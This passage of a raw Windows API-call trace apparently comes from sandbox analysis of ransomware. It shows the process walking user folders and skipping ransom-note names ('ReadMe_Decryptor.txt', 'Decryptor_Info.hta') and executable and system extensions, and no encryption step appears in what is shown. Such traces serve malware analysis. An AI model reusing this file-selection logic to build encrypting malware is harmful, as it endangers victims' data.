lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dc4b320, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dc4b320, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd869fe87, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player (2).lnk", cAlternateFileName="WINDOW~4.LNK")) returned 1 [0081.715] lstrcmpW (lpString1="Windows Media Player (2).lnk", lpString2=".") returned 1 [0081.715] lstrcmpW (lpString1="Windows Media Player (2).lnk", lpString2="..") returned 1 [0081.715] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="ReadMe_Decryptor.txt") returned 1 [0081.715] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="Decryptor_Info.hta") returned 1 [0081.715] PathFindExtensionW (pszPath="Windows Media Player (2).lnk") returned=".lnk" [0081.715] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0081.715] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0081.715] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0081.715] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2e24b3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0081.715] lstrcmpW (lpString1="Windows Media Player.lnk", lpString2=".") returned 1 [0081.715] lstrcmpW (lpString1="Windows Media Player.lnk", lpString2="..") returned 1 [0081.715] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="ReadMe_Decryptor.txt") returned 1 [0081.715] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="Decryptor_Info.hta") returned 1 [0081.715] PathFindExtensionW (pszPath="Windows Media Player.lnk") returned=".lnk" [0081.715] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0081.716] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0081.716] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0081.716] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2e24b3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0081.716] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0081.716] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2e24b3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0081.716] FindClose (in: hFindFile=0x72a960 | out: hFindFile=0x72a960) returned 1 [0081.716] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e143190, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0081.716] lstrcmpW (lpString1="Window Switcher.lnk", lpString2=".") returned 1 [0081.716] lstrcmpW (lpString1="Window Switcher.lnk", lpString2="..") returned 1 [0081.716] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="ReadMe_Decryptor.txt") returned 1 [0081.716] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Decryptor_Info.hta") returned 1 [0081.716] PathFindExtensionW (pszPath="Window Switcher.lnk") returned=".lnk" [0081.716] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0081.717] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0081.717] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0081.717] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e143190, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0081.717] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0081.717] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b77470, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b77470, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UserData", cAlternateFileName="")) returned 1 [0081.717] lstrcmpW (lpString1="UserData", lpString2=".") returned 1 [0081.717] lstrcmpW (lpString1="UserData", lpString2="..") returned 1 [0081.717] lstrlenW (lpString="UserData") returned 8 [0081.717] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="UserData" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" [0081.717] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\" [0081.717] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned 83 [0081.717] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0081.722] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.722] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b77470, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b77470, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.725] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.725] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.725] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0081.725] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0081.725] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0081.725] lstrlenW (lpString="Low") returned 3 [0081.725] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpString2="Low" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" [0081.725] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\" [0081.725] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned 87 [0081.725] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a960 [0081.726] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.726] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.727] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.727] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.727] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="65UX3YG0", cAlternateFileName="")) returned 1 [0081.727] lstrcmpW (lpString1="65UX3YG0", lpString2=".") returned 1 [0081.727] lstrcmpW (lpString1="65UX3YG0", lpString2="..") returned 1 [0081.728] lstrlenW (lpString="65UX3YG0") returned 8 [0081.728] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="65UX3YG0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0" [0081.728] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\" [0081.728] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\") returned 96 [0081.728] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0081.729] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.729] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.731] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.731] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.731] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.731] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0081.731] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AY721QDR", cAlternateFileName="")) returned 1 [0081.731] lstrcmpW (lpString1="AY721QDR", lpString2=".") returned 1 [0081.731] lstrcmpW (lpString1="AY721QDR", lpString2="..") returned 1 [0081.731] lstrlenW (lpString="AY721QDR") returned 8 [0081.731] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="AY721QDR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR" [0081.731] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\" [0081.731] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\") returned 96 [0081.731] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0081.733] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.733] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.735] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.735] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.735] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.735] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0081.735] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DZBKZBIC", cAlternateFileName="")) returned 1 [0081.735] lstrcmpW (lpString1="DZBKZBIC", lpString2=".") returned 1 [0081.735] lstrcmpW (lpString1="DZBKZBIC", lpString2="..") returned 1 [0081.735] lstrlenW (lpString="DZBKZBIC") returned 8 [0081.736] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="DZBKZBIC" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC" [0081.736] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\" [0081.736] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\") returned 96 [0081.736] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0081.738] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.738] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.740] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.740] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.740] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.740] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0081.740] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbaf619f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0081.740] lstrcmpW (lpString1="index.dat", lpString2=".") returned 1 [0081.740] lstrcmpW (lpString1="index.dat", lpString2="..") returned 1 [0081.740] lstrcmpiW (lpString1="index.dat", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.740] lstrcmpiW (lpString1="index.dat", lpString2="Decryptor_Info.hta") returned 1 [0081.740] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0081.740] lstrcmpiW (lpString1=".dat", lpString2=".exe") returned -1 [0081.740] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0081.741] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0081.741] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0081.741] lstrcmpiW (lpString1=".dat", lpString2=".msi") returned -1 [0081.741] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VRLZOZ0E", cAlternateFileName="")) returned 1 [0081.741] lstrcmpW (lpString1="VRLZOZ0E", lpString2=".") returned 1 [0081.741] lstrcmpW (lpString1="VRLZOZ0E", lpString2="..") returned 1 [0081.741] lstrlenW (lpString="VRLZOZ0E") returned 8 [0081.741] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="VRLZOZ0E" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E" [0081.741] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\" [0081.741] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\") returned 96 [0081.741] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0081.743] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.743] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.745] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.745] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.745] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.745] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0081.749] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: 